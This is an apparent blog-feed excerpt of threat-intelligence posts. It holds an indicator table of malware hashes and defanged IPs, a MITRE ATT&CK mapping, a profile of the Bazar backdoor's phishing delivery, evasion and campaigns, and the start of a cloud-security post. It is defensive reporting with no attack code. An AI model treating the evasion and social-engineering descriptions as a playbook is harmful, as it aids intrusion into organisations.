&lt;td&gt;&lt;code&gt;327090cbddf94fc901662f0e863ba0cb&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;88.214.27[.]40&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;39d550fd902ca4c1461961d01ad1aeb6&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;51.83.216[.]211&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;MITRE ATT&amp;amp;CK&lt;span class="hx:absolute hx:-mt-20" id="mitre-attck"&gt;&lt;/span&gt;
&lt;a href="#mitre-attck" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tactic&lt;/th&gt;
&lt;th&gt;ID&lt;/th&gt;
&lt;th&gt;Name&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Execution&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1059/001/"target="_blank" rel="noopener"&gt;T1059.001&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1059/001/"target="_blank" rel="noopener"&gt;PowerShell&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1059/003/"target="_blank" rel="noopener"&gt;T1059.003&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1059/003/"target="_blank" rel="noopener"&gt;Windows Command Shell&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1047/"target="_blank" rel="noopener"&gt;T1047&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1047/"target="_blank" rel="noopener"&gt;Windows Management Instrumentation&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Persistence&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1547/001/"target="_blank" rel="noopener"&gt;T1547.001&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1547/001/"target="_blank" rel="noopener"&gt;Registry Run Keys / Startup Folder&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1547/004/"target="_blank" rel="noopener"&gt;T1547.004&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1547/004/"target="_blank" rel="noopener"&gt;Winlogon Helper DLL&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1546/003/"target="_blank" rel="noopener"&gt;T1546.003&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1546/003/"target="_blank" rel="noopener"&gt;Windows Management Instrumentation Event Subscription&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1546/012/"target="_blank" rel="noopener"&gt;T1546.012&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1546/012/"target="_blank" rel="noopener"&gt;Image File Execution Options Injection&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1053/005/"target="_blank" rel="noopener"&gt;T1053.005&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1053/005/"target="_blank" rel="noopener"&gt;Scheduled Task&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Privilege Escalation&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1548/002/"target="_blank" rel="noopener"&gt;T1548.002&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1548/002/"target="_blank" rel="noopener"&gt;Bypass User Account Control&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defense Evasion&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1562/001/"target="_blank" rel="noopener"&gt;T1562.001&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1562/001/"target="_blank" rel="noopener"&gt;Disable or Modify Tools&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1070/004/"target="_blank" rel="noopener"&gt;T1070.004&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1070/004/"target="_blank" rel="noopener"&gt;File Deletion&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Credential Access&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1003/001/"target="_blank" rel="noopener"&gt;T1003.001&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1003/001/"target="_blank" rel="noopener"&gt;LSASS Memory&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Discovery&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1082/"target="_blank" rel="noopener"&gt;T1082&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1082/"target="_blank" rel="noopener"&gt;System Information Discovery&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1016/"target="_blank" rel="noopener"&gt;T1016&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1016/"target="_blank" rel="noopener"&gt;System Network Configuration Discovery&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1018/"target="_blank" rel="noopener"&gt;T1018&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1018/"target="_blank" rel="noopener"&gt;Remote System Discovery&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Command and Control&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1571/"target="_blank" rel="noopener"&gt;T1571&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1571/"target="_blank" rel="noopener"&gt;Non-Standard Port&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1071/001/"target="_blank" rel="noopener"&gt;T1071.001&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1071/001/"target="_blank" rel="noopener"&gt;Web Protocols&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;</description></item><item><title>Wrapping Up a Year of Infamous Bazar Campaigns</title><link>https://research.intezer.com/blog/2021/05/wrapping-up-a-year-of-infamous-bazar-campaigns/</link><pubDate>Thu, 27 May 2021 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2021/05/wrapping-up-a-year-of-infamous-bazar-campaigns/</guid><description>
&lt;h2&gt;Bazar is the latest tool developed by the TrickBot gang&lt;span class="hx:absolute hx:-mt-20" id="bazar-is-the-latest-tool-developed-by-the-trickbot-gang"&gt;&lt;/span&gt;
&lt;a href="#bazar-is-the-latest-tool-developed-by-the-trickbot-gang" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Common malware used for cybercrime such as Agent Tesla, Dridex and Formbook
have been around for at least five years and are still distributed and active.
About one year ago, a new malware named Bazar breathed some fresh air into this
landscape. Since its
&lt;a href="https://www.bleepingcomputer.com/news/security/bazarbackdoor-trickbot-gang-s-new-stealthy-network-hacking-malware/"target="_blank" rel="noopener"&gt;first campaign&lt;/a&gt;,
Bazar has been extremely active and has taken part in large-scale breaches
including the
&lt;a href="https://www.bleepingcomputer.com/news/security/uhs-hospitals-hit-by-reported-country-wide-ryuk-ransomware-attack/"target="_blank" rel="noopener"&gt;nationwide Ryuk ransomware attack on UHS hospitals&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The name &amp;lsquo;Bazar&amp;rsquo; was given to the malware because of its use of
&lt;a href="https://emercoin.com/en/emerdns"target="_blank" rel="noopener"&gt;EmerDNS&lt;/a&gt; (.bazar) domains for
command-and-control networking. On top of serving as a backdoor, Bazar is
designed to gain a foothold on the victim&amp;rsquo;s machine to deliver an additional
payload as a next phase of the attack. The time between Bazar installation and
payload delivery can vary between a
&lt;a href="https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/"target="_blank" rel="noopener"&gt;few hours&lt;/a&gt;
to &lt;a href="https://www.hhs.gov/sites/default/files/bazarloader.pdf"target="_blank" rel="noopener"&gt;days&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;In this post we will profile Bazar and highlight four prominent campaigns
delivering this year-old malware.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2021/05/wrapping-up-a-year-of-infamous-bazar-campaigns/images/fig1.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;h2&gt;Key Profiling&lt;span class="hx:absolute hx:-mt-20" id="key-profiling"&gt;&lt;/span&gt;
&lt;a href="#key-profiling" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;h3&gt;Attribution&lt;span class="hx:absolute hx:-mt-20" id="attribution"&gt;&lt;/span&gt;
&lt;a href="#attribution" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Based on code similarities, delivery, infrastructure and operation methods,
researchers believe that Bazar was developed by the TrickBot gang (aka Team9).&lt;/p&gt;
&lt;h3&gt;Targets&lt;span class="hx:absolute hx:-mt-20" id="targets"&gt;&lt;/span&gt;
&lt;a href="#targets" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The operators behind the malware are mainly financially motivated, meaning they
target organizations with high capital.&lt;/p&gt;
&lt;h3&gt;Delivery Method&lt;span class="hx:absolute hx:-mt-20" id="delivery-method"&gt;&lt;/span&gt;
&lt;a href="#delivery-method" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The malware delivery method is purely based on social engineering initiated
with a phishing email. The email will usually contain a link to a website,
hosting a malicious Microsoft Office document, delivering Bazar upon running
the document on a victim&amp;rsquo;s machine, or it will host the malware itself
masqueraded as a document.&lt;/p&gt;
&lt;h3&gt;Stealth&lt;span class="hx:absolute hx:-mt-20" id="stealth"&gt;&lt;/span&gt;
&lt;a href="#stealth" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Bazar implements the following evasion techniques to bypass detection:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://attack.mitre.org/techniques/T1553/002/"target="_blank" rel="noopener"&gt;Signing malware with certificates&lt;/a&gt;:
Antiviruses tend to rely on code signing certificates to increase the
credibility of a file. Therefore, signed files are less likely to be detected
as malicious by Antivirus vendors.&lt;/p&gt;
&lt;p&gt;Fileless payload: Bazar uses a lightweight loader to inject its fileless
payload into memory. Fileless malware challenges traditional Antivirus
solutions as it resides only in memory and leaves no footprint on disk. The
following is the genetic analysis of a Bazar sample
(&lt;code&gt;3578e96b72cba790179d546f11e045ca&lt;/code&gt;) injecting fileless code into memory.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/05/wrapping-up-a-year-of-infamous-bazar-campaigns/images/fig2.png" title="Bazar sample (3578e96b72cba790179d546f11e045ca) injects fileless code" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Bazar sample (3578e96b72cba790179d546f11e045ca) injects fileless code&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Use of decentralized C2C: For its C2C communication, Bazar uses
&lt;a href="https://emercoin.com/en/emerdns"target="_blank" rel="noopener"&gt;EmerDNS&lt;/a&gt; which is a decentralized domain name
system based on Emercoin blockchain technology. EmerDNS domains cannot be
altered, revoked, or suspended, which allows Bazar&amp;rsquo;s operations to be nearly
immune from a take down attempt by law enforcement.&lt;/p&gt;
&lt;h2&gt;Timeline and Milestone Campaigns&lt;span class="hx:absolute hx:-mt-20" id="timeline-and-milestone-campaigns"&gt;&lt;/span&gt;
&lt;a href="#timeline-and-milestone-campaigns" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;As Bazar evolves and takes part in different phishing campaigns, we are
highlighting the top four milestones of this threat so far.&lt;/p&gt;
&lt;h3&gt;Apr 2020 – Bazar Exposed to the Masses&lt;span class="hx:absolute hx:-mt-20" id="apr-2020--bazar-exposed-to-the-masses"&gt;&lt;/span&gt;
&lt;a href="#apr-2020--bazar-exposed-to-the-masses" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;With the outburst of COVID-19, many threat actors leveraged the pandemic for
phishing campaigns. This theme was used as part of the
&lt;a href="https://www.bleepingcomputer.com/news/security/bazarbackdoor-trickbot-gang-s-new-stealthy-network-hacking-malware/"target="_blank" rel="noopener"&gt;first documented campaign&lt;/a&gt;
delivering Bazar.&lt;/p&gt;
&lt;p&gt;Similar to other campaigns using Bazar, this one began with a phishing email
containing a link to a page hosted on Google Docs. On this page, the victim was
lured to click on a link preview to a doc report. By clicking on the link, the
victim would download the Bazar malware executable masqueraded as a document.
Because
&lt;a href="https://www.bleepingcomputer.com/news/microsoft/hiding-windows-file-extensions-is-a-security-risk-enable-now/"target="_blank" rel="noopener"&gt;Windows does not present&lt;/a&gt;
a file&amp;rsquo;s extension by default, threat actors are able to trick victims by
masquerading a non-executable file type, so that the file has a word document
icon but it is in fact an executable.&lt;/p&gt;
&lt;p&gt;The next image shows a Google Docs page hosting the malware executable.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/05/wrapping-up-a-year-of-infamous-bazar-campaigns/images/fig3.png" title="COVID-19 themed phishing campaign (source: BleepingComputer)" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;COVID-19 themed phishing campaign (source: BleepingComputer)&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Interestingly, one of these phishing emails was sent to a BleepingComputer
domain.&lt;/p&gt;
&lt;h3&gt;Sep 2020 – Healthcare, Ransomware and Bazar in Between&lt;span class="hx:absolute hx:-mt-20" id="sep-2020--healthcare-ransomware-and-bazar-in-between"&gt;&lt;/span&gt;
&lt;a href="#sep-2020--healthcare-ransomware-and-bazar-in-between" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;&lt;a href="https://www.bleepingcomputer.com/news/security/uhs-hospitals-hit-by-reported-country-wide-ryuk-ransomware-attack/"target="_blank" rel="noopener"&gt;UHS hospitals&lt;/a&gt;
were hit by a Ryuk ransomware attack in September 2020. This attack was part of
a greater trend targeting hospitals and other healthcare-related organizations
in the United States.&lt;/p&gt;
&lt;p&gt;These ransomware attacks were initiated with phishing emails sent to employees
delivering Bazar but also BuerLoader or TrickBot. After an employee was lured
to install Bazar, a Cobalt Strike Beacon was delivered to the victim&amp;rsquo;s machine
for lateral movement and persistence. Together with Cobalt Strike, other
penetration testing tools were installed and ran on the victim&amp;rsquo;s machine for
reconnaissance and privilege escalation purposes. Ryuk ransomware was delivered
as the final step of the attack to run widely on the organization&amp;rsquo;s assets.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/05/wrapping-up-a-year-of-infamous-bazar-campaigns/images/fig4.png" title="CISA alert on the ransomware campaign" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;CISA alert on the ransomware campaign&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;This attack chain not only targeted the healthcare sector but also went after
different organizations inside France after it became public that
&lt;a href="https://www.lemagit.fr/actualites/252491402/Cyberattaque-Ryuk-chez-Sopra-Steria-ce-que-nous-apprennent-les-echantillons"target="_blank" rel="noopener"&gt;Sopra Steria&lt;/a&gt;,
a French consulting organization, was hit by Ryuk.&lt;/p&gt;
&lt;h3&gt;Jan 2021 – Hello, Who is This?&lt;span class="hx:absolute hx:-mt-20" id="jan-2021--hello-who-is-this"&gt;&lt;/span&gt;
&lt;a href="#jan-2021--hello-who-is-this" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The BazarCall campaign may be the most interesting social engineering method
used for delivering Bazar thus far.&lt;/p&gt;
&lt;p&gt;As the first step, a personalized phishing email is sent claiming that a free
trial for a [fake] product is about to expire, and the addressee will be
charged via a &amp;ldquo;pre provided payment method.&amp;rdquo; The email also states that if the
addressee wishes to drop the subscription, they can make a call to the
&amp;ldquo;customer service center.&amp;rdquo; Once a victim calls the customer service center
number, the &amp;ldquo;service provider&amp;rdquo; lures the user to browse a phishing website,
insert a code, and click on &amp;ldquo;unsubscribe.&amp;rdquo; By clicking unsubscribe a malicious
Microsoft Office document is downloaded delivering Bazar.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/05/wrapping-up-a-year-of-infamous-bazar-campaigns/images/fig5.png" title="Example of a BazarCall phishing email (source: Sophos)" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Example of a BazarCall phishing email (source: Sophos)&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The email has no indication of maliciousness as it does not contain any links
or attachments but it is purely an attempt to exploit the innocence of the
victims who are lured to make the phone call.&lt;/p&gt;
&lt;p&gt;This &lt;a href="https://www.youtube.com/watch?v=uAkeXCYcl4Y"target="_blank" rel="noopener"&gt;YouTube video&lt;/a&gt; documents a
phone call between a researcher posing as a victim and the &amp;ldquo;service provider.&amp;rdquo;&lt;/p&gt;
&lt;p&gt;The campaign, which started by delivering BazarLoader, continues to deliver
other loaders such as IceID.&lt;/p&gt;
&lt;h3&gt;Feb 2021 – Nim What?&lt;span class="hx:absolute hx:-mt-20" id="feb-2021--nim-what"&gt;&lt;/span&gt;
&lt;a href="#feb-2021--nim-what" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;In the beginning of February, a new and unusual
&lt;a href="https://www.bleepingcomputer.com/news/security/trickbots-bazarbackdoor-malware-is-now-coded-in-nim-to-evade-antivirus/"target="_blank" rel="noopener"&gt;version of Bazar&lt;/a&gt;
was detected—an implementation of the backdoor written in
&lt;a href="https://nim-lang.org/"target="_blank" rel="noopener"&gt;Nim&lt;/a&gt;, which is a statically-typed self-contained
programming language.&lt;/p&gt;
&lt;p&gt;Because Nim is not a common choice for malware development, it is believed that
the use of this programming language is an attempt to bypass detection. This
attempt can be considered successful as this version, also known as
&amp;lsquo;&lt;a href="https://twitter.com/GossiTheDog/status/1357396209372168199"target="_blank" rel="noopener"&gt;BazarNimrod&lt;/a&gt;&amp;rsquo; and
&amp;lsquo;&lt;a href="https://www.proofpoint.com/us/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware"target="_blank" rel="noopener"&gt;NimzaLoader&lt;/a&gt;,&amp;rsquo;
had low detection rates in VirusTotal.&lt;/p&gt;
&lt;p&gt;Bazar is not the first malware written in Nim. Sofacy (Russian APT) developed a
&lt;a href="https://www.welivesecurity.com/2019/09/24/no-summer-vacations-zebrocy/"target="_blank" rel="noopener"&gt;downloader in Nim&lt;/a&gt;
for their Zebrocy tool.&lt;/p&gt;
&lt;h2&gt;Final Words&lt;span class="hx:absolute hx:-mt-20" id="final-words"&gt;&lt;/span&gt;
&lt;a href="#final-words" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Threat actors are highly motivated and must keep reinventing themselves to stay
effective. They put in the time and money to bypass Antivirus detection on the
way to successful compromises. We assess that cybercriminals will continue to
step up their game with social engineering creativity and different malware
implementation.&lt;/p&gt;
&lt;h2&gt;How to Protect Your Organization&lt;span class="hx:absolute hx:-mt-20" id="how-to-protect-your-organization"&gt;&lt;/span&gt;
&lt;a href="#how-to-protect-your-organization" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Bazar and similar threats use social engineering as an entry point and keep a
low profile once inside. Keep in mind that it takes only one employee to take
down an entire organization.&lt;/p&gt;
&lt;p&gt;Take the following steps to keep your organization clean from these type of
attacks:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Enhance social engineering awareness inside your organization.&lt;/li&gt;
&lt;li&gt;Perform proactive hunting on all endpoints inside your organization to make
sure that no traces of malicious code or malware exist. Intezer&amp;rsquo;s live
Endpoint Scanner collects all binaries running in memory, including fileless,
and classifies them using genetic code analysis technology.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/05/wrapping-up-a-year-of-infamous-bazar-campaigns/images/fig6.png" title="Endpoint scan on an infected machine" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Endpoint scan on an infected machine&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;References&lt;span class="hx:absolute hx:-mt-20" id="references"&gt;&lt;/span&gt;
&lt;a href="#references" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.bleepingcomputer.com/news/security/bazarbackdoor-trickbot-gang-s-new-stealthy-network-hacking-malware/"target="_blank" rel="noopener"&gt;https://www.bleepingcomputer.com/news/security/bazarbackdoor-trickbot-gang-s-new-stealthy-network-hacking-malware/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.bleepingcomputer.com/news/security/bazarcall-malware-uses-malicious-call-centers-to-infect-victims/"target="_blank" rel="noopener"&gt;https://www.bleepingcomputer.com/news/security/bazarcall-malware-uses-malicious-call-centers-to-infect-victims/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon"target="_blank" rel="noopener"&gt;https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://threatpost.com/bazarloader-malware-slack-basecamp/165455/"target="_blank" rel="noopener"&gt;https://threatpost.com/bazarloader-malware-slack-basecamp/165455/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://news.sophos.com/en-us/2021/04/15/bazarloader/"target="_blank" rel="noopener"&gt;https://news.sophos.com/en-us/2021/04/15/bazarloader/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles#trickbot-connection"target="_blank" rel="noopener"&gt;https://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles#trickbot-connection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon"target="_blank" rel="noopener"&gt;https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Why Relying on the Cloud Provider for Security is Not Enough</title><link>https://research.intezer.com/blog/2021/05/why-relying-on-the-cloud-provider-for-security-is-not-enough/</link><pubDate>Thu, 20 May 2021 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2021/05/why-relying-on-the-cloud-provider-for-security-is-not-enough/</guid><description>
&lt;p&gt;73% of organizations using the cloud are not sure which parts of security fall
under their responsibility. Ultimately, the customer is responsible for
security in the cloud, meaning protecting the workloads (applications and code)
hosted on top of the virtual resources created in the cloud provider&amp;rsquo;s
platform. Whereas the cloud provider is responsible for the security of the
cloud, meaning the physical infrastructure (e.g., data centers, network and
server equipment) and for operating that infrastructure (e.g., physical
security, power redundancy, connectivity between facilities). The big three
cloud providers, Amazon Web Services (AWS), Microsoft Azure and Google Cloud
Platform (GCP), offer various built-in tools and services designed to prevent a
wide range of attacks and reduce the attack surface. Yet, breaches still
happen. Let&amp;rsquo;s examine some cases where the security tools provided by the cloud
provider were not enough to fully secure the customer&amp;rsquo;s environment.&lt;/p&gt;
&lt;h2&gt;Security in the Cloud&lt;span class="hx:absolute hx:-mt-20" id="security-in-the-cloud"&gt;&lt;/span&gt;
&lt;a href="#security-in-the-cloud" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Before we get started, it&amp;rsquo;s important to note that most cloud monitoring tools
are based on one or more of the following categories:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Network security&lt;/strong&gt; – Firewalls, networking segmentation and protection
against DDoS attacks.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Vulnerability management&lt;/strong&gt; – Scanning and patching vulnerabilities in the
cloud system.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cloud Workload Protection Platforms (CWPP)&lt;/strong&gt; – Focus on securing the
workloads themselves with runtime visibility and protection.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cloud Security Posture Management (CSPM)&lt;/strong&gt; – Find misconfigurations and
security risks based on predefined security policies in the cloud
infrastructure. In some cases, remediation can be automated to terminate an
attack.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;SIEM capability&lt;/strong&gt; – A combination of security event management (SEM) and
security information management (SIM). The goal is to collect logs from
different sources and take the appropriate action when an incident happens.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The security tools provided by the cloud providers are not bulletproof though.
Certain attack vectors, such as unknown vulnerabilities and supply chain
backdoors, are not preventable.&lt;/p&gt;
&lt;h2&gt;Cloud Snooper Attack Bypasses Firewall&lt;span class="hx:absolute hx:-mt-20" id="cloud-snooper-attack-bypasses-firewall"&gt;&lt;/span&gt;
&lt;a href="#cloud-snooper-attack-bypasses-firewall" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The
&lt;a href="https://news.sophos.com/en-us/2020/02/25/cloud-snooper-attack-bypasses-firewall-security-measures/"target="_blank" rel="noopener"&gt;Cloud Snooper&lt;/a&gt;
attack bypassed the on-premise
&lt;a href="https://aws.amazon.com/network-firewall/?whats-new-cards.sort-by=item.additionalFields.postDateTime&amp;amp;whats-new-cards.sort-order=desc"target="_blank" rel="noopener"&gt;AWS Network Firewall&lt;/a&gt;
using a rootkit. The rootkit hid the communication with the Command and control
(C2) server by disguising it as &amp;ldquo;innocent&amp;rdquo; packets and then dropped a RAT. The
attackers had control over the victims and a safe channel to communicate with
the C2. Despite having a well-configured firewall the attackers still managed
to infiltrate the system, meaning the security tools of AWS couldn&amp;rsquo;t stop this
attack. Having runtime visibility is an important last line of defense, since
it detects the execution of any unauthorized code or commands which are
critical for an attacker to carry out a successful attack. AWS doesn&amp;rsquo;t support
this capability, therefore the cloud customer should leverage third party tools
for workload-centric security and runtime protection.&lt;/p&gt;
&lt;h2&gt;Security Tools Have Vulnerabilities Too&lt;span class="hx:absolute hx:-mt-20" id="security-tools-have-vulnerabilities-too"&gt;&lt;/span&gt;
&lt;a href="#security-tools-have-vulnerabilities-too" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Cloud services
&lt;a href="../../../2021/05/cve-2021-27075-microsoft-azure-vulnerability-allows-privilege-escalation-and-leak-of-data"&gt;have their own vulnerabilities&lt;/a&gt;
which can be exploited as an initial attack vector. The problem is it&amp;rsquo;s nearly
impossible to eliminate all software vulnerabilities, especially for large
deployments spread across multiple clouds and when using third parties.
Consider that not every software has a fix and not every vulnerability is
known. Not to mention, fixing vulnerabilities takes time and third party
vulnerable software also exists. Relying only on the cloud provider&amp;rsquo;s tools is
